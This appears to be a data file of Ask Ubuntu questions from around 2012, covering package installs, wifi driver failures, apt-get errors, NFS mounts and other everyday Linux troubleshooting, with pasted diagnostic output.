234702	how can i know which commands were installed with a package ?	how can i get a list of commands that have been installed with a particular package ? for example , if i install chromium , what should type now ? or if i install moreutils , how do i know which commands have been installed ?
234707	sccs returns 'permission denied '	i installed and set up the package `` cssc '' , but when i try to use sccs with the command `` sccs create filename '' i receive the message `` permission denied '' . the exit status of the command is 69 , which i understand means `` could not exec program '' . how can i get sccs to work properly ? thanks very much , tcnm
234715	how to analyze a `` [ waiting for headers ] '' problem during `` apt-get update '' ?	sudo apt-get update sometimes becomes stucked : ... 99 % [ waiting for headers ] this seems to be a common problem and can have several reasons . for example , on one machine , it was caused because i used a bad proxy server configuration . is there a way to systematically analyze the problem ? it looked at the man apt-get but could not find any option that provides more information to isolate the problem . are there any tools besides apt-get that i can use to get more insights ?
234717	ubuntu 11.04 bumblebee package not found	the official nvidia drivers are not working properly on my thinkpad t520 so i was going to give bumblebee a shot . i have an ubuntu 11.04 install and am reciving a package not found error when trying to install bumblebee . i followed the instructions on the bumblebe site . it did work on my 12.10 install but not on my 11.04. the error i am receiving is sudo apt-get install bumblebee bumblebee-nvidia reading package lists ... done building dependency tree reading state information ... done e : unable to locate package bumblebee e : unable to locate package bumblebee-nvidia thanks
234719	partitioning for two separate ssds	i 'm installing ubuntu on my laptop with two ssd drives : 24 gb sandisk ssd i100 with read/write performance of 450/350 mb/s 256 gb samsung 840 pro with read/write performance of 540/520 mb/s the layout i 've been thinking is : /boot partition swap partition partition for the rest as you see , the samsung should be far more performant . so , does putting any of these on the sandisk make sense ? is there something that would ? or should i just leave it empty ?
234728	how to use grep to find the next 7 characters after `` temp1 '' ?	how can i get `` +45.0°c '' if the following output was a file ( http : //paste.linuxthefish.net/4 @ raw ) ? i can get it to one line by doing sensors -a acpitz-virtual-0 > sen grep temp1 ~/sen but it still has a load of useless crap on it : '' temp1 : +42.0â°c ( crit = +90.0â°c ) ''
234729	wlan problem ( detects networks but wo n't connect )	so my problem is that i recently put ubuntu 12.10 as dual boot on my desktop pc . after a few hours of googling i was able to get my d-link dwa-142 to `` work '' . however , it will only see the networks but wo n't connect . it did connect to the network once , but dropped after a few minutes . i already did apt-get upgrade & & update . i am currently tethering via my galaxy s2 . if i put on a hotspot via the smartphone , it will connect , but will not have an internet conncetion . thanks in advance . iwconfig gives : wlan0 ieee 802.11g essid : off/any mode : managed frequency:2.412 ghz access point : not-associated bit rate:144.5 mb/s sensitivity=-200 dbm rts thr=2346 b fragment thr=2346 b power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 nm-tool gives : networkmanager tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ndiswrapper state : unavailable default : no hw address : 00:19:5b:55:17:53 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points while trying to connect `sudo tail -f /var/log/syslog` gives me : dec 31 18:28:19 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning dec 31 18:28:21 toterlaptop networkmanager [ 731 ] : < warn > activation ( wlan0/wireless ) : association took too long . dec 31 18:28:21 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] dec 31 18:28:21 toterlaptop networkmanager [ 731 ] : < warn > activation ( wlan0/wireless ) : asking for new secrets dec 31 18:28:21 toterlaptop networkmanager [ 731 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . dec 31 18:28:21 toterlaptop networkmanager [ 731 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : get_secret_flags : assertion `is_secret_prop ( setting , secret_name , error ) ' failed dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > activation ( wlan0/wireless ) : connection 'wireless connection 1 ' has security , and secrets exist . no new secrets needed . dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > config : added 'ssid ' value 'mg ' dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > config : added 'scan_ssid ' value '1 ' dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > config : added 'key_mgmt ' value 'wpa-psk ' dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > config : added 'psk ' value ' < omitted > ' dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . dec 31 18:28:24 toterlaptop networkmanager [ 731 ] : < info > config : set interface ap_scan to 1 dec 31 18:28:29 toterlaptop kernel : [ 621.828627 ] end_request : i/o error , dev fd0 , sector 0 dec 31 18:28:29 toterlaptop kernel : [ 621.828634 ] buffer i/o error on device fd0 , logical block 0 dec 31 18:28:34 toterlaptop wpa_supplicant [ 2258 ] : wlan0 : trying to associate with 00:1f:3f : d5:1f:32 ( ssid='mg ' freq=2412 mhz ) dec 31 18:28:37 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > associating dec 31 18:28:42 toterlaptop kernel : [ 634.000763 ] end_request : i/o error , dev fd0 , sector 0 dec 31 18:28:42 toterlaptop kernel : [ 634.000771 ] buffer i/o error on device fd0 , logical block 0 dec 31 18:28:47 toterlaptop wpa_supplicant [ 2258 ] : wlan0 : authentication with 00:1f:3f : d5:1f:32 timed out . dec 31 18:28:47 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : supplicant interface state : associating - > disconnected dec 31 18:28:48 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning dec 31 18:28:50 toterlaptop networkmanager [ 731 ] : < warn > activation ( wlan0/wireless ) : association took too long . dec 31 18:28:50 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] dec 31 18:28:50 toterlaptop networkmanager [ 731 ] : < warn > activation ( wlan0/wireless ) : asking for new secrets dec 31 18:28:50 toterlaptop networkmanager [ 731 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . dec 31 18:28:50 toterlaptop networkmanager [ 731 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . dec 31 18:28:54 toterlaptop kernel : [ 646.165373 ] end_request : i/o error , dev fd0 , sector 0 dec 31 18:28:54 toterlaptop kernel : [ 646.165380 ] buffer i/o error on device fd0 , logical block 0 dec 31 18:28:58 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > inactive dec 31 18:29:00 toterlaptop networkmanager [ 731 ] : < warn > no agents were available for this request . dec 31 18:29:00 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : device state change : need-auth - > failed ( reason 'no-secrets ' ) [ 60 120 7 ] dec 31 18:29:00 toterlaptop networkmanager [ 731 ] : < info > marking connection 'wireless connection 1 ' invalid . dec 31 18:29:00 toterlaptop networkmanager [ 731 ] : < warn > activation ( wlan0 ) failed for connection 'wireless connection 1 ' dec 31 18:29:00 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'node ' ) [ 120 30 0 ] dec 31 18:29:00 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] dec 31 18:29:03 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : device state change : disconnected - > unavailable ( reason 'none ' ) [ 30 20 0 ] dec 31 18:29:03 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] dec 31 18:29:03 toterlaptop networkmanager [ 731 ] : < info > ( wlan0 ) : taking down device . dec 31 18:29:03 toterlaptop networkmanager [ 731 ] : < info > wifi hardware radio set disabled dec 31 18:29:06 toterlaptop kernel : [ 658.337199 ] end_request : i/o error , dev fd0 , sector 0 dec 31 18:29:06 toterlaptop kernel : [ 658.337206 ] buffer i/o error on device fd0 , logical block 0 dec 31 18:29:18 toterlaptop kernel : [ 670.508660 ] end_request : i/o error , dev fd0 , sector 0 dec 31 18:29:18 toterlaptop kernel : [ 670.508667 ] buffer i/o error on device fd0 , logical block 0 dec 31 18:29:30 toterlaptop kernel : [ 682.677361 ] end_request : i/o error , dev fd0 , sector 0 dec 31 18:29:30 toterlaptop kernel : [ 682.677368 ] buffer i/o error on device fd0 , logical block 0 dec 31 18:29:42 toterlaptop kernel : [ 694.845447 ] end_request : i/o error , dev fd0 , sector 0 dec 31 18:29:42 toterlaptop kernel : [ 694.845453 ] buffer i/o error on device fd0 , logical block 0 dec 31 18:29:55 toterlaptop kernel : [ 707.021368 ] end_request : i/o error , dev fd0 , sector 0
234730	unable to see wireless networks on 12.10 ( ar928x card )	i am unable to view any wireless networks ( accessible through other devices ) . in the nm-applet i can see that the 'enable wireless ' is selected . could anyone please let me know what the problem is ? i am providing outputs for some commands which were suggested in related questions please let me know if any other information is necessary . lspci -nn |grep 0280 04:00.0 network controller [ 0280 ] : atheros communications inc. ar928x wireless network adapter ( pci-express ) [ 168c:002a ] ( rev 01 ) lshw -c network *-network description : wireless interface product : ar928x wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 01 serial : f0:7b : cb:13:36:20 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-19-generic firmware=n/a latency=0 multicast=yes wireless=ieee 802.11abgn resources : irq:16 memory : fbef0000-fbefffff *-network description : ethernet interface product : netlink bcm57780 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 01 serial : a4 : ba : db : ec : bf:0e size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.123 duplex=full firmware=sb v2.05 ip=192.168.51.250 latency=0 multicast=yes port=mii speed=1gbit/s resources : irq:48 memory : fbff0000-fbffffff rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no sudo iwconfig eth0 no wireless extensions . lo no wireless extensions . clearwlan0 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=21 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off dmesg|grep ath9 [ 20.169143 ] ieee80211 phy0 : selected rate control algorithm 'ath9k_rate_control' [ 20.169414 ] registered led device : ath9k-phy0
234732	no wifi on zoostorm laptop	i have installed ubuntu 12.10 on a new zoostorm laptop , intel pentium dc b980 2.4ghz , 8gb ram , 500gb hdd , 15.6\ '' hd led . ubuntu works a treat but the wifi will not work . has anyone had a similar problem and knows how to fix it ? thanks
234733	broken packages - libg11-mesa-dri : i386	happy new year ! not so for my pc : o ) while installing the ia32-libs my pc ran into a broken package problem . ( the system is ubuntu 12.10 - 64 bit and i want to compile 32bit targets . ) the console output is vague about this but i did get more information out of the gui update-manager : this is the output : '' de afhankelijkheden van de volgende pakketten konden niet ge誰nstalleerd worden : libgl1-mesa-dri : i386 : depends : libgcc1 ( > = 1:4.1.1 ) maar 1:4.7.2-2ubuntu1 is ge誰nstalleerd '' that 's dutch for : libgl1-mesa depends on libgcc1 1.4.1.1 but 1.4.7.2 is already installed on my system . the real problem is the inability for apt-get to overcome this because i ca n't perform any updates , not by the console nor the gui update manager . so my pc is basically stuck . i tried ; apt-get install -f , remove , autoremove , update , upgrade . and so on . has someone an idea how to solve this ? many thanks rm
234735	disk tool points out that the partition is misaligned by 512 bytes	the disk tool points out that the partition is misaligned by 512 bytes . the ubuntu system is my secondary to win xp sp3 , and the partition mentioned is the ubuntu`s partition with ntfs file sys . questions:1.should i fix it ? if y how ? 2.can it mess some win handling of this particular partition if changed by linux ? thanks
234737	should media files ( htpc ) using nfs mount using fstab/static or autofs ?	i 'm using ubuntu 12.04 with xbmc and am streaming media files from my fileserver ( mounted using nfs ) . right now i have fstab configured to mount my nfs share like this : 192.168.0.99 : /tank/media /mnt/media nfs4 _netdev , auto 0 0 however , sometimes the mount is not yet available ( ? ) when xbmc starts , so when i try to play a file from that mount it freezes ( i.e . just waits , and waits ... ) . to fix the problem i need to ssh into the server and mount -a . ( or it sometimes i can wait a few minutes and it might fix itself and/or finish mounting . is it better to use autofs for this situation ? if not , what other options are available ? edit : i also want the mount to be resilient against file server downtime or weird network issues , etc .
234740	how safe is ubuntu tweak 's janitor ?	on ubuntu tweak , it says that janitor can be run to free up some disk space . is this safe ? i am running 12.04 .
234741	java installation failed	i am using ubuntu 11.10 on flash memory due to corrupted hard drive that could hardly keep os . usually when computer get down because of empty battery or other reason it is reinstalled , the ubuntu on temp memory and i have to reinstall everything again , like skype , plugins for firefox , etc . however i usually need a few basic things like adobe plugin and generally did n't need java and i use ubuntu for about a half and year in this way ( ok , i used to have also windows on computer for other things but now i do n't ) so lately i actually found out i can not use some chatroom sites , probably thats the biggest issue . and i really do n't get how things are done with java . i had some trouble at beginning with the adobe plugin but at some point i got how it is done and made a 'habit ' but with the java installation - i am struggling . i tried in two different ways , one with the soft manager and other in terminal directly but non worked . i would be glad if you could guide me and give me instructions on how to do it with my ubuntu on flash memory . its not a big deal but it irritates me . i will appreciate your help . and happy new year everyone : ) )
234745	how can i use virtualgl or an alternative with xvfb ?	i 'm running a ubuntu machine as a client , but i need to start a 3d game to get automated screenshots , but within xvfb so it does not interfere with normal computer function . however , the game is quite graphics-intensive , so within the xvfb graphical sandbox , it fails to use the gpu . when i run it on the default x server without xvfb , it manages to use the graphics card , but interferes with use of the machine since it is , of course , onscreen . i checked out virtualgl , but it mentions simply headless x servers , not xvfb or even ati cards . i have an ati graphics card , and plan to use import to grab screenshots from the xvfb program . so , how can i force xvfb to use a physical graphics card supporting opengl to run a program , in a way where i can use import to grab screenshots ?
234749	on-the-fly conversion of flac to mp3 when syncing with android ?	i have a large collection of flac music files which i would like to sync to my android phone . however , the flac files are very large ... and before i bother to create a seperate mp3 music library it occurred to me that there may be a way to get rythmbox ( or some other app ) to convert them as part of the syncing process . i 've read that itunes automatically converts alac files to m4a lossy format during syncs ... is there a way to do this on ubuntu ?
234751	can i have a user execute sudo commands without being an administrator ?	i recently became a unix admin for some relatives , and they are quite far up the creek on how to use ubuntu . i know that one key to unix administration is not to use the admin account as little as possible , which i 'm trying to enforce on their machine . i 've looked at other articles regarding this , but they do the easy way out - changing the account to administrator . that is changing the permissions completely . i want my standard user account to be able to execute sudo commands , but not be an administrator account . thank you in advance for any help .
234757	upstart init script remains on apt-get remove	i just created my first .deb file ever from a python script . i included a package.upstart file under package/debian and all installed great . however , i noticed that apt-get remove package leaves the upstart script there . i tested this functionality by removing another program that has an upstart script , and this does seem to be normal behaviour but i would like to confirm this . is this normal behaviour ? is n't it bad that the upstart script will be trying to run my program on every boot of a user 's machine even if they have removed my application ?
234758	how to use a python virtualenv with sudo ?	i am trying to make a python environment separate from the system one ( using virtualenv ) in a directory which is not under /home , because i need to use it to build other software that has to be accessible to multiple users . i can create and activate the virtualenv all right , but when i sudo some command ( for example to make or compile other software ) , it is the system python that is used ( i can tell because of the available modules ) . since on ubuntu it is not a good thing to use the root user , is there a way to tell sudo to use a virtualenv ? or maybe this is not the correct approach , and i should make a completely new python installation ? i am using the 64bit version of ubuntu 12.04 ( and python 2.7 ) .
234759	does ubuntu support nfc hardware on nexus 7 ?	i was wondering if the nfc hardware on nexus 7 is supported by ubuntu . as i understand , the nexus 7 contains the pn544 chip set . i installed the pc/sc service ( pcscd ) which works with external usb based nfc devices out of the box . is it possible to use this service with the internal nfc chip ?
234767	recovering files/not booting on windows 7 after installing ubuntu	my friend installed ubuntu 12.04 on my hp laptop , and now i ca n't boot windows and all my work files are gone . so 1 . ) how can i uninstall ubuntu ? 2 . ) how can i recover all my work files [ my job is on the line if i ca n't get these files back ] 3 . ) how can i boot windows 7 ?
234772	ubuntu 12.04.1 lts not booting 32 bit	i 'm using ubuntu 12.04.1 lts when i boot the system i got a dialog box '' the system is running in low-graphics mode '' i used tty alt+ctrl+ ( f1-f6 ) do nothing my machine is hp i5 pavilion g6
234773	i ca n't update steam	when i am trying to update my computer the error appears like this ... an image is better than words ... . i am running an ubuntu 12.10 processor intel® pentium ( r ) cpu p6200 @ 2.13ghz × 2 how can i resolve this problem ?
234775	toshiba satellite c855-s5343 - wireless randomly drops	i 'm having an issue that seems to be pretty common both on here , and the ubuntu forums . sadly , i could n't find any solutions that corresponded to my particular laptop model . the issue is simply : the wireless connection will randomly drop . when this happens , the connection to the network is still active according to the network manager . it 's quite obvious that the connection has dropped , though ; internet access no longer works . when i disconnect and reconnect , it works for a little while before dropping again . i 've tried the common sense solutions : checking additional drivers ( nothing there ) , checking to make sure there is nothing wrong with the router , etc . i also tried installing linux-backports-modules-cw-* from the repository ( a common solution floating around on the forums ) . this activated my ethernet port ( another issue i was having ) , but it did n't make a difference in regard to the wireless connection dropping . the operating system i 'm using is ubuntu 12.10 64 bit , and the laptop is a toshiba satellite c855-s5343 . $ sudo lshw -c network *-network description : ethernet interface product : ar8162 fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 10 serial : 00:8c : fa:26:2d : bd capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx firmware=alx latency=0 link=no multicast=yes port=twisted pair resources : irq:43 memory : c8500000-c853ffff ioport:3000 ( size=128 ) *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 20:16 : d8:1d:97:2a width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.5.0-21-generic firmware=n/a ip=192.168.1.4 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport:2000 ( size=256 ) memory : c8400000-c8403fff $ dmesg [ 17.101237 ] wlan0 : authenticate with 00:1f:33 : dc:55 : e5 [ 17.120299 ] wlan0 : send auth to 00:1f:33 : dc:55 : e5 ( try 1/3 ) [ 17.127313 ] wlan0 : authenticated [ 17.127463 ] rtl8192ce 0000:02:00.0 : wlan0 : disabling ht due to wep/tkip use [ 17.142316 ] wlan0 : associate with 00:1f:33 : dc:55 : e5 ( try 1/3 ) [ 17.144423 ] wlan0 : rx assocresp from 00:1f:33 : dc:55 : e5 ( capab=0x411 status=0 aid=5 ) [ 17.144541 ] wlan0 : associated [ 17.146380 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready
234777	how can i adjust the setting for oggvorbis encoding in rhythmbox on ubuntu precise ( 12.04 ) ?	i want to read a cd to my music library . i want to use oggvorbis for compression . i want to set the quality level to 6 ( or 0.6 ) . in previous versions i could manipulate the gstreamer pipeline manually : audio/x-raw-float , rate=44100 , channels=2 ! vorbisenc name=enc quality=0.6 ! oggmux ( i have seen that there is an easy to use slider for the quality in ubuntu 12.10 . ) how can i set the quality level for ogg ( and mp3 ) when `` extracting a cd to library '' on ubuntu 12.04 ? thanks ! can not click on settings in rhythmbox and soundjuicer on ubuntu 12.04 :
234778	no gui and no internet	i dual boot 12.10 with windows 8 on a uefi system . the other day , i was installing some python stuff when apt-get suggested i run a dpkg command ( i have no familiarity with how dpkg works ) , and that appeared to mess everything up on the next reboot . i booted into ubuntu only to find no gui . i then ran startx , which told me it could not start the server and that no screens were found . i then looked at the logs and determined that my graphics drivers were gone ; fglrxinfo yielded `` no command found '' . when i ran sudo apt-get install fglrx fglrx-amdcccle , apt responded with could not resolve us.archive.ubuntu.com . doing ping google.com , ping 72.14.207.99 , and ifconfig all seem to confirm the fact that i was not connected to the internet . i 'm not sure what to do now . i 'm not too familiar with unix/linux networking or graphics . i do n't have any updates to roll back to , but my ubuntu installation is fairly new . ideally , i want to fix my issues in place , without having to resort to a live cd/usb . i have integrated graphics : amd radeon hd 7660g . any help is appreciated ! : )
234779	duplicate truecrypt drive	how would i go about duplicating a truecrypt hard drive for redundancy purposes ? i have lots of original video content , which i store on encrypted drives . and wanted to know the best way to create truecrypt backups
234781	how do you install drivers	i am new to ubuntu and put a new graphics card in my computer . i need to know how to install the driver information from the cd , because there is no autoplay or anything like that . i need very simple instructions , because i have never used ubuntu before , i just figured out how to close windows
234785	mapping playstation controller to keys	title might not be right , just no idea what to type . i am in possession of a dualshock 3 ( a.k.a playstation 3 controller ) and a wire to my lubuntu 12.04 notebook . bluetooth does not work on this . i want to play a game with not so many controls , cave story + to be precise , using this controller . after toying around in qtsixa and different things i 've found scattered across the web i 've given up , i 've tried re-mapping the buttons without any form of signs why it does n't work . oh , and the buttons that i want to bind ( on the keyboard ) are up- , down- , left- and right arrows , a , s , z , x q , w ( i think that 's all . ) if you need more information just ask !
234787	is it already possible to test ubuntu for android ?	i 'm very excited about ubuntu being able to run trhough an android smartphone just by connecting it to a monitor , a keyboard and a mouse . now i 'm wondering if there is a way to test it ? are there any daily-builds of it ? alpha package ? if you do n't know what ubuntu for android is take a look at it 's page . other things i 'm unsure about ubuntu for android is : will it work for tablets too ? does it require a dual-core smartphone ? do you necessarily need a dock ? is there a release date for the first version of it ? i 've looked for some info in ubuntu for android launchpad page , but i did n't find anything useful . in this page canonical lets you to leave your contact if you are interest in ubuntu for android .
234793	gsettings and anacron	i wrote a script to change my desktop background . i want this script to run on anacron because i often turn my computer off at night . i 've tested parts of the script , and i think the problem is with this line : display=:0 gsettings_backend=dconf gsettings set org.gnome.desktop.background picture-uri ' '' file : // ' $ wallpath ' '' ' ( $ wallpath is the wallpaper path ) it switches my wallpaper but it does n't when anacron runs . i figured this was because anacron runs as root ( i also check dconf for root and my user to check this ) . so i hacked up a way to run anacron as a specific user . but that did n't work . can anyone help me figure out a way to run gsettings as a user ? i 've tried su ( username ) -c 'sh run/this/script ' to no avail . i 've found some stuff about exporting some dbus env variables , but i 'm having difficulty following it .
234797	installing guest addition on 12.10 server	i am encountering a lot of problem trying to install guest additions on ubuntu 12.10 server . i have tried many solutions provided in the internet but none of them are working . after mounting the guest additions tools and running ./vboxlinuxadditions.run it fails . here is a screenshot of the problem : how to solve this problem ?
234798	how can i fix a 404 error using the ubuntu archives ?	when running an update i get these errors : : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/karmic-backports/main/source/sources 404 not found [ ip : 91.189.92.201 80 ] , w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/karmic-backports/restricted/source/sources 404 not found [ ip : 91.189.92.201 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . there were more of the same kind of lines . how do i fix this ?
234799	i installed jockey-gtk but how do i run it ?	zuber @ zuber-pc : ~ $ sudo apt-get install jockey-gtk reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : nvidia-common python-xkit use 'apt-get autoremove ' to remove them . the following new packages will be installed : jockey-gtk 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/3,158 b of archives . after this operation , 53.2 kb of additional disk space will be used . selecting previously unselected package jockey-gtk . ( reading database ... 156414 files and directories currently installed . ) unpacking jockey-gtk ( from ... /jockey-gtk_0.9.7-0ubuntu11_all.deb ) ... setting up jockey-gtk ( 0.9.7-0ubuntu11 ) ... zuber @ zuber-pc : ~ $ jockey-gtk the program 'jockey-gtk ' is currently not installed . you can install it by typing : sudo apt-get install jockey-gtk and this not only occur with jockey-gtk . i have same problem with synergy ( i did not tried with other software ) . is it known problem or am i only one ? how do i fix it ?
234801	problem with netflix-desktop and kubuntu 12.10	not quite sure if this is an appropriate place to ask the question as it is n't technically supported but i am having some issues with the netflix-desktop package on my kubuntu 12.10 laptop . following the instructions listed here i added the ppa and then installed netflix-desktop and did not seem to get any errors during the installation . however when i run netflix-desktop nothing seems to happen . ( i know the poster here : is there a way to stream netflix ? he had other things that were installed upon first launch but i did n't see anything else get configured ) i am wondering if there is something going wrong with the fact that i 'm using kubuntu instead of ubuntu ? thanks in advance
234812	ubuntu 12.04 oem install from usb - need help to either change boot options or add to usb without losing oem option	i 'd like to install ubuntu 12.04 lts in oem mode on a few desktops via usb drive . these instructions work fine to install in oem mode on a vm using the .iso from ubuntu site : how do i pre-install ubuntu for someone ( oem install ) ? but as soon as i add that .iso to my usb the only option that shows up when i press f4 for the advance installation modes is `` normal '' . i 'm using rufus to add the image to my flash drive and encountering this issue . i 've also tried using unetbootin and i ca n't seem to get the advance installation options to show up by pressing f4 . ideally i 'd like to just make a permanent change to the boot options so the image boots in oem mode since i will use this periodically for that purpose . if that 's not an option i 'd be fine with suggestions for other programs that i can use to add the image to the usb and test to see if it will still have an oem option .
234819	upgrade webkit pygtk libraries	i 'm developing a pygtk-html5 application ( using quickly ) , but the webkit libraries ( webview ) are a bit old , at least for using some of the latest html5 apis ( like indexeddb ) is it possible to upgrade the libraries ? and if so , when i package the app , will it have that specific library that i just upgraded ?
234833	what distro of ubuntu to choose when i focus on performance ? kubuntu ?	i do have an old laptop . it has 512mb of ram and weak processor . i would like to use it only for internet ( www and email ) . sometimes maybe run a movie on it . i have a fresh ubuntu installation , but its very slow : ( how can i force ubuntu to focus on performance first and do n't use anything that will slow down my computer . i now use unity ( i think its the default thing ) , but i 'm willing to switch to any other except the terminal . i use firefox or chrome for www and email . is kubuntu better for performance than ubuntu ? i think i have good graphic card ( i was ableto connect monitor to it and there set resolution to 1610xsomething )
234835	i 'm considering dual-booting this on my desktop , but will everything work ?	ok so right now i have windows 8 on my gaming desktop that i use constantly . the two games i run most are runescape and minecraft . i am wondering one , will these work on ubuntu ? and two , will my amd radeon hd 6850 work with ubuntu ? i have used it before and did n't like it too much ( probably because the laptop i was running was horrible and i did n't [ and still do n't ] know how to install anything through coding or whatever i had to do ) but i want to give it another shot .
234836	unable to install vlc on 12.04 , have tried all the solutions posted on related questions	i really have tried a number of the solutions posted on similar questions , no matter what approach i attempt , i can only ever install the following packages : ii libvlc5 2.0.3+git20121229+r489-0~r41~precise1 multimedia player and streamer library ii libvlccore5 2.0.3+git20121229+r489-0~r41~precise1 base library for vlc and its modules ii vlc-data 2.0.3+git20121229+r489-0~r41~precise1 common data for vlc ii vlc-nox 2.0.3+git20121229+r489-0~r41~precise1 multimedia player and streamer ( without x support ) i up until yesterday had the vlc player installed , but a failed attempt at installing skype removed a ton of packages from my system , vlc being one of them . here is a link to the captured output of whenever i run sudo apt-get install vlc : https : //gist.github.com/d43204060bf3fe0532c9
234838	backlight strobe on resume - ubuntu 12.10	i 've just set up ubuntu 12.10 on my gateway nv53 and so far i 'm loving it . i 've used ubuntu in the past , mostly as a system rescue disk , but i 've got a couple of servers running it , so i 'm no stranger to the platform . anyway , the problem i 'm having is that while the laptop will suspend normally both through the menu option and by closing the lid , when it resumes the backlight becomes what can only be described as a strobe light : after a few seconds of black after waking the computer ( which is normal ) , the display lights up to the brightest white i 've ever seen come from it for a split second , then turns off again . this repeats about every two seconds until i hold the power button to turn it off . if i look carefully during one of the flashes , the display seems to be displaying some uneven horizontal lines across the upper half of the screen . now , from what i 've been reading , this is most likely a display driver problem . i tried installing the proprietary driver , but ran into all kinds of issues with unity not starting after login and the like . the card in the laptop is a ati mobility radeon hd 4200 , which from what i understand is no longer officially supported by amd : steven @ steven-laptop : ~ $ lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880m [ mobility radeon hd 4200 series ] does anyone have any ideas as to what could be causing this ?
234840	kde theme appears in unity , cinnamon , and xfce	i am running ubuntu 12.10 with unity , cinnamon , xcfe , and kde installed . every time i run kde , the kde theme appears in all the applications when run on any of the other desktops . i 'd really appreciate it if i could get this fixed . if a picture would be helpful , i can add one . thanks !
234845	`` hash sum mismatch '' on trying to install kile	after installing ubuntu 12.04 i was trying to install kile in order to edit .tex files . but this message showed up on attempting to install kile and updates : w : failed to fetch gzip : /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_precise-security_restricted_binary-i386_packages hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead now i ca n't install any software at all . what can i do ? editing : i have done which you said . but now i 'm trying to install okular but this is showing : - (
